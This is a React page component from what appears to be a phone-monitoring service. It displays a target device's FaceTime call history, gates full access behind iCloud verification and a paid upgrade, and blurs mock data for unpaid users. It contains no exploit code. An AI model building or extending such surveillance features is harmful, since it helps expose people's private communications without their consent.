// ** React Imports
import { Fragment, useCallback, useEffect, useRef, useState } from 'react'
import { useExtremeUpgradeRefresh } from 'src/hooks/useExtremeUpgradeRefresh'


import { useTranslation } from 'src/utils/i18n'

import dayjs from 'dayjs'
import duration from 'dayjs/plugin/duration'

dayjs.extend(duration)

// ** MUI Imports
import Box from '@mui/material/Box'
import { useTheme } from '@mui/material/styles'
import useMediaQuery from '@mui/material/useMediaQuery'

// ** Store & Actions Imports
import { useDispatch, useSelector } from 'react-redux'
import { selectMessage, fetchUserProfile, fetchChatsContacts, removeSelectedChat } from 'src/store/apps/telegram'

// ** Hooks
import { useSettings } from 'src/@core/hooks/useSettings'

// ** Utils Imports
import { getInitials } from 'src/@core/utils/get-initials'
import { formatDateToMonthShort } from 'src/@core/utils/format'

// ** Chat App Components Imports
import TelegramSideBar from 'src/@core/components/telegram/telegram-side-bar'
import TelegramContent from 'src/@core/components/telegram/telegram-content'
import TelegramContacts from 'src/@core/components/telegram/telegram-contacts'
import { getAllDashboard } from 'src/@api/dashboard'
import Image from 'next/image'
import Head from 'next/head'
import { setCurrentTab, changeExtremeService } from 'src/store/apps/Common'
import { styled } from '@mui/material/styles'
import { generateMockData } from 'src/utils'
import ExtremeUpgradeModal from 'src/@core/components/modal/extreme-upgrade'
import { useExtremeFeatureAccessGate } from 'src/hooks/useExtremeFeatureAccessGate'
import { getUserAccountOrder } from 'src/@api/login'

const ScrollDiv = styled('div')({
  '@media (max-width: 600px)': {
    '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
    scrollbarWidth: 'none',  /* 适用于 Firefox */
    '&::-webkit-scrollbar': {
      display: 'none', /* 适用于 WebKit 浏览器（如 Chrome、Safari 和新版 Edge） */
    }
  }
})

const Facetime = () => {
  const { t } = useTranslation('common')
  const store = useSelector(state => state.Telegram)
  const storeCommon = useSelector(state => state.Common)

  // ** States
  const [userStatus, setUserStatus] = useState('online')
  const [leftSidebarOpen, setLeftSidebarOpen] = useState(false)
  const [userProfileLeftOpen, setUserProfileLeftOpen] = useState(false)
  const [userProfileRightOpen, setUserProfileRightOpen] = useState(false)

  const [advanced, setAdvanced] = useState(true) // 是否购买高级服务
  const [fetchLoading, setFetchLoading] = useState(true) // 数据获取中
  const basicNotOver = [null, ''].includes(storeCommon.resetTime.basicUpdateDownloadTime) // 是否未完成一步验证
  const advancedNotOver = [null, ''].includes(storeCommon.resetTime.advancedUpdateDownloadTime) // 高级数据未下载完成（空 = 未完成）
  // 高级功能门控（对齐 SpyX）：未绑高级 → 跳 /ios/extreme-verification；数据未就绪 → 暂停渲染
  const { gatePending, showUpgradeModal } = useExtremeFeatureAccessGate(advanced)
  const [justVerified, setJustVerified] = useState(false) // 是否为刚完成验证

  // ** Hooks
  const theme = useTheme()
  const { settings } = useSettings()
  const dispatch = useDispatch()
  const hidden = useMediaQuery(theme.breakpoints.down('lg'))

  // ** Vars
  const { skin } = settings
  const smAbove = useMediaQuery(theme.breakpoints.up('sm'))
  const sidebarWidth = smAbove ? 370 : 300
  const mdAbove = useMediaQuery(theme.breakpoints.up('md'))

  const [chat, setChat] = useState(true)
  const [headImg, setHaedImg] = useState('/images/telegram/2.jpg')

  useEffect(() => {
    dispatch(fetchUserProfile())
    dispatch(fetchChatsContacts())
  }, [dispatch])
  const handleLeftSidebarToggle = () => setLeftSidebarOpen(prev => !prev)
  const handleUserProfileLeftSidebarToggle = () => setUserProfileLeftOpen(prev => !prev)
  const handleUserProfileRightSidebarToggle = () => setUserProfileRightOpen(prev => !prev)

  const [switchDataType, setSwitchDataType] = useState('call')
  const [chatCallData, setChatCallData] = useState([])
  const [allCallData, setAllCallData] = useState([])
  const [currentState, setCurrentState] = useState('all')
  const [isLoading, setIsLoading] = useState(true) //正在加载获取数据

  // 分页参数
  const [pagination, setPagination] = useState({
    reqNum: 50, // 单次查询数量
    nowOffset: 0, // 偏移量
    maxNum: false // 全部数据查询完毕
  })

  const username = JSON.parse(localStorage.getItem('DeviceUser')) != null
    ? JSON.parse(localStorage.getItem('DeviceUser')).username
    : ''

  const getChatCallData = async nowOffset => {
    // 获取最近的10笔订单
    let res = await getUserAccountOrder({ page: 1, pageSize: 10 })

    // 查找有限期最长的订单
    const lastOrder = res.data.sort((a, b) => dayjs(b.expire_time).valueOf() - dayjs(a.expire_time).valueOf())[0]

    // 计算是否为增值服务上线前付费用户

    // 增值服务上线前付费用户状态更新

    let data = await getAllDashboard({
      username,
      params: {
        category: 'FACETIME_INTERACTION',
        offset: nowOffset,
        limit: pagination.reqNum,
        deviceUdid:
          JSON.parse(localStorage.getItem('currentDevice')) != null
            ? JSON.parse(localStorage.getItem('currentDevice'))['Unique Identifier']
            : ''
      }
    })
    setIsLoading(false)
    const advanced = username == null || !('advanced' in data) || ['true', true].includes(data?.advanced) // 高级服务开通状态
    setAdvanced(advanced)
    dispatch(changeExtremeService(advanced)) // 更新高级服务状态

    if (data.data.contents == null) {
      setPagination(page => ({ ...page, maxNum: true }))
      setFetchLoading(false)

      return
    }

    let result = data.data.contents.map(row => {
      return {
        ...row,
        date: dayjs(row.date).format('YYYY-MM-DD HH:mm:ss'),
        call: row.isFromMe ? 'mdi:phone-outgoing' : 'ic:round-phone-callback',
        color: row.isFromMe ? '#000' : '#D43538'
      }
    })
    if (!advanced) result = generateMockData(result)
    setChatCallData(old => ([...old, ...result]))
    setAllCallData(old => ([...old, ...result]))
    setFetchLoading(false)
  }

  useEffect(() => {
    const nowOffset = 0
    getChatCallData(nowOffset)
  }, [])

  const dom = useRef(null)

  // 滚动百分比
  const [scroll, setScroll] = useState(0)

  // 升级成功后：预缓冲已在 notify 完成，这里重拉详情读 advanced
  useExtremeUpgradeRefresh(
    useCallback(() => {
      setAdvanced(true)
      setChatCallData([])
      setAllCallData([])
      setPagination({ reqNum: 50, nowOffset: 0, maxNum: false })
      setScroll(0)
      setFetchLoading(true)
      getChatCallData(0)
    }, [])
  )

  // 获取滚动百分比
  useEffect(() => {
    const handScroll = () => {
      if (dom.current) {
        const { scrollTop, scrollHeight, clientHeight } = dom.current
        const progress = scrollTop / (scrollHeight - clientHeight) * 100

        setScroll(progress.toFixed(0))
      }
    }

    const currentRef = dom.current
    if (currentRef) {
      currentRef.addEventListener('scroll', handScroll)
    }

    return () => {
      if (currentRef) {
        currentRef.removeEventListener('scroll', handScroll)
      }
    }
  }, [])

  // 监听滚动百分比
  useEffect(() => {
    if (scroll >= 100 && advanced) {
      const nowOffset = pagination.nowOffset + pagination.reqNum
      setPagination(page => ({ ...page, nowOffset }))

      if (!pagination.maxNum) getChatCallData(nowOffset)
    }
  }, [scroll])

  useEffect(() => {
    const title = t('Facetime')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch])

  const getStateData = () => {
    let newData = []
    switch (currentState) {
      case 'missed':
        newData = allCallData.filter(item => item.originated === 0 && item.duration === 0)

        setChatCallData([...newData])
        break
      case 'outgoing':
        newData = allCallData.filter(item => item.isFromMe)

        setChatCallData([...newData])
        break
      case 'incoming':
        newData = allCallData.filter(item => !item.isFromMe)

        setChatCallData([...newData])
        break

      default:
        setChatCallData([...allCallData])
        break
    }
  }

  useEffect(() => {
    getStateData()
  }, [allCallData])

  useEffect(() => {
    getStateData()
  }, [currentState])

  useEffect(() => {
    const handelWidth = () => {
      if (window.innerWidth > 990) setCurrentState('all')
    }

    handelWidth()

    window.addEventListener('resize', handelWidth)

    return () => {
      window.removeEventListener('resize', handelWidth)
    }
  }, [])

  return (
    <>
      <Head>
        <meta name="format-detection" content="telephone=no" />
      </Head>
      {switchDataType == 'call' ? (
        <div className='relative'>
          {
            !fetchLoading && !gatePending &&
            <>
              {
                (!basicNotOver && !advancedNotOver && !justVerified) ?
                  <>
                    {/* 高级服务开通提示 */}
                    {showUpgradeModal && <ExtremeUpgradeModal open />}
                  </>
                  :
                  <>
                    {/* 增值服务 iCloud验证流程 */}
                  </>
              }

            </>
          }
          <div className='w-[144px] Blds:w-[528px] h-[33px] Blds:h-[42px] flex bg-[#EAEAEA] Blds:bg-inherit rounded-[8px] mb-[15px] mx-auto smjs:hidden'>
            <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
              <div
                className={`${currentState === 'all'
                  ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
                  : ''
                  } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
                onClick={() => setCurrentState('all')}
              >
                <Image src='/images/facetime/all.svg' width={24} height={24} alt='all call' />
                <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('All Calls')}</span>
              </div>
            </div>
            <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
              <div
                className={`${currentState === 'missed'
                  ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
                  : ''
                  } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
                onClick={() => setCurrentState('missed')}
              >
                <Image src='/images/facetime/missed.svg' width={24} height={24} alt='missed' />
                <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('Missed Calls')}</span>
              </div>
            </div>
            <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
              <div
                className={`${currentState === 'outgoing'
                  ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
                  : ''
                  } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
                onClick={() => setCurrentState('outgoing')}
              >
                <Image src='/images/facetime/outgoing.svg' width={24} height={24} alt='outgoing' />
                <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('Outgoing Calls')}</span>
              </div>
            </div>
            <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
              <div
                className={`${currentState === 'incoming'
                  ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
                  : ''
                  } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
                onClick={() => setCurrentState('incoming')}
              >
                <Image src='/images/facetime/incoming.svg' width={24} height={24} alt='incoming' />
                <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('Incoming Calls')}</span>
              </div>
            </div>
          </div>

          <ScrollDiv ref={dom} className={`bg-[#FFF] [box-shadow:0px_0px_12px_0px_#00000021] rounded-[10px] Mlg:h-[calc(var(--vh2)*100-139px)] lg:smj:h-[calc(var(--vh2)*100-148px)] smjs:Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)] pb-[20px] flex flex-col ${advanced ? 'overflow-auto' : 'overflow-hidden'}`}>
            <table className={`border-separate border-spacing-x-[15px] border-spacing-y-[10px] w-full smj:hidden ${!advanced ? 'blur-[16px] select-none' : ''}`}>
              <tr className='sticky top-0 bg-[#FFF]'>
                <th className='pt-[10px] text-start text-[14px] text-[#000] font-[600] text-nowrap'>{t('DATE')}</th>
                <th className='pt-[10px] text-start text-[14px] text-[#000] font-[600] text-nowrap'>{t('DIRECTION')}</th>
                <th className='pt-[10px] text-start text-[14px] text-[#000] font-[600] text-nowrap'>{t('DURATION')}</th>
                <th className='pt-[10px] text-start text-[14px] text-[#000] font-[600] text-nowrap'>{t('GROUP NAME')}</th>
                <th className='pt-[10px] text-start text-[14px] text-[#000] font-[600] text-nowrap'>
                  {t('DISPLAY NAME')}
                </th>
                <th className='pt-[10px] text-start text-[14px] text-[#000] font-[600] text-nowrap'>{t('IDENTIFIER')}</th>
              </tr>
              {chatCallData.map((row, i) => (
                <tr key={i}>
                  <td className='text-[14px] text-[#000] text-nowrap'>{row.date}</td>
                  <td className='text-[14px] text-[#000] text-nowrap flex items-center'>
                    <Image
                      className='mr-[5px]'
                      src={row.isFromMe ? 'images/calls/outgoing.svg' : 'images/calls/incoming.svg'}
                      width={24}
                      height={24}
                      alt={row.originated === 0 ? (row.duration === 0 ? 'missed' : 'incoming') : 'outgoing'}
                    />
                  </td>
                  <td className='text-[14px] text-[#000] text-nowrap'>{row.duration}</td>
                  <td className='text-[14px] text-[#000] text-nowrap'>{row.groupName}</td>
                  <td className='text-[14px] text-[#000] text-nowrap'>{row.displayName}</td>
                  <td className='text-[14px] text-[#000] text-nowrap'>{row.identifier}</td>
                </tr>
              ))}
            </table>

            {/* 移动端排版 */}
            <div className={`smjs:hidden h-auto ${!advanced ? 'blur-[16px] select-none' : ''}`}>
              {chatCallData.map((row, index) => (
                <div key={index} className='h-[64px] flex w-full'>
                  <div className='w-[20px] mt-3 mr-2 ml-[15px]'>
                    {row.isFromMe && <Image src="/images/facetime/outgoing2.svg" alt='outgoing' width={18} height={18} />}
                  </div>
                  <div className='border-[#e6e6e6] border-b-[0.5px] w-full flex flex-col justify-center h-[64px] font-[Poppins]'>
                    <p className={`text-[16px] font-[500] leading-[24px] ${row.originated === 0 && row.duration === 0 ? ' text-[#FE1616]' : ' text-[#000000]'}`}>{row.displayName || row.identifier}</p>
                    <div className='flex justify-between'>
                      <p className='text-[14px] font-[400] leading-[21px] text-[#8A8A8E]'>{dayjs.duration(row.duration, 'seconds').format('HH:mm:ss')}</p>
                      <p className='text-[14px] font-[400] text-[#8A8A8E] leading-[21px] mr-[15px]'>{dayjs(row.date).format('YYYY/MM/DD HH:mm')}</p>
                    </div>
                  </div>
                </div>
              ))}
            </div>
            {advanced && allCallData.length == 0 && !isLoading &&
              <div className='text-center px-5 absolute inset-0 flex justify-center items-center pointer-events-none'>
                {t('It appears theres no data to show here yet')}<br />
                {t('If data exists it may take up to 1 hour to download and appear')}<br />
                {t('We suggest checking back in a little while')}
              </div>}
          </ScrollDiv>
        </div>
      ) : null}

      {switchDataType == 'chat' ? (
        <Box
          className='app-chat'
          sx={{
            width: '100%',
            minHeight: 'calc(var(--vh)*100 - 370px)',
            display: 'flex',
            borderRadius: 1,
            position: 'relative',
            boxShadow: skin === 'bordered' ? 0 : 6,
            ...(skin === 'bordered' && { border: `1px solid ${theme.palette.divider}` })
          }}
        >
          <TelegramSideBar
            store={store}
            hidden={hidden}
            mdAbove={mdAbove}
            dispatch={dispatch}
            userStatus={userStatus}
            selectMessage={selectMessage}
            getInitials={getInitials}
            sidebarWidth={sidebarWidth}
            setUserStatus={setUserStatus}
            leftSidebarOpen={leftSidebarOpen}
            removeSelectedChat={removeSelectedChat}
            userProfileLeftOpen={userProfileLeftOpen}
            formatDateToMonthShort={formatDateToMonthShort}
            handleLeftSidebarToggle={handleLeftSidebarToggle}
            handleUserProfileLeftSidebarToggle={handleUserProfileLeftSidebarToggle}
            headImg={headImg}
            setChat={setChat}
            chat={chat}
            setHaedImg={setHaedImg}
          />
          {chat && (
            <TelegramContent
              store={store}
              hidden={hidden}
              mdAbove={mdAbove}
              dispatch={dispatch}
              getInitials={getInitials}
              sidebarWidth={sidebarWidth}
              userProfileRightOpen={userProfileRightOpen}
              handleLeftSidebarToggle={handleLeftSidebarToggle}
              handleUserProfileRightSidebarToggle={handleUserProfileRightSidebarToggle}
              headImg={headImg}
              setHaedImg={setHaedImg}
            />
          )}

          {chat === false ? (
            <TelegramContacts
              store={store}
              hidden={hidden}
              mdAbove={mdAbove}
              dispatch={dispatch}
              getInitials={getInitials}
              sidebarWidth={sidebarWidth}
              userProfileRightOpen={userProfileRightOpen}
              handleLeftSidebarToggle={handleLeftSidebarToggle}
              handleUserProfileRightSidebarToggle={handleUserProfileRightSidebarToggle}
              headImg={headImg}
              setHaedImg={setHaedImg}
            />
          ) : (
            ''
          )}
        </Box>
      ) : null}
    </>
  )
}

Facetime.contentHeightFixed = true

export default Facetime


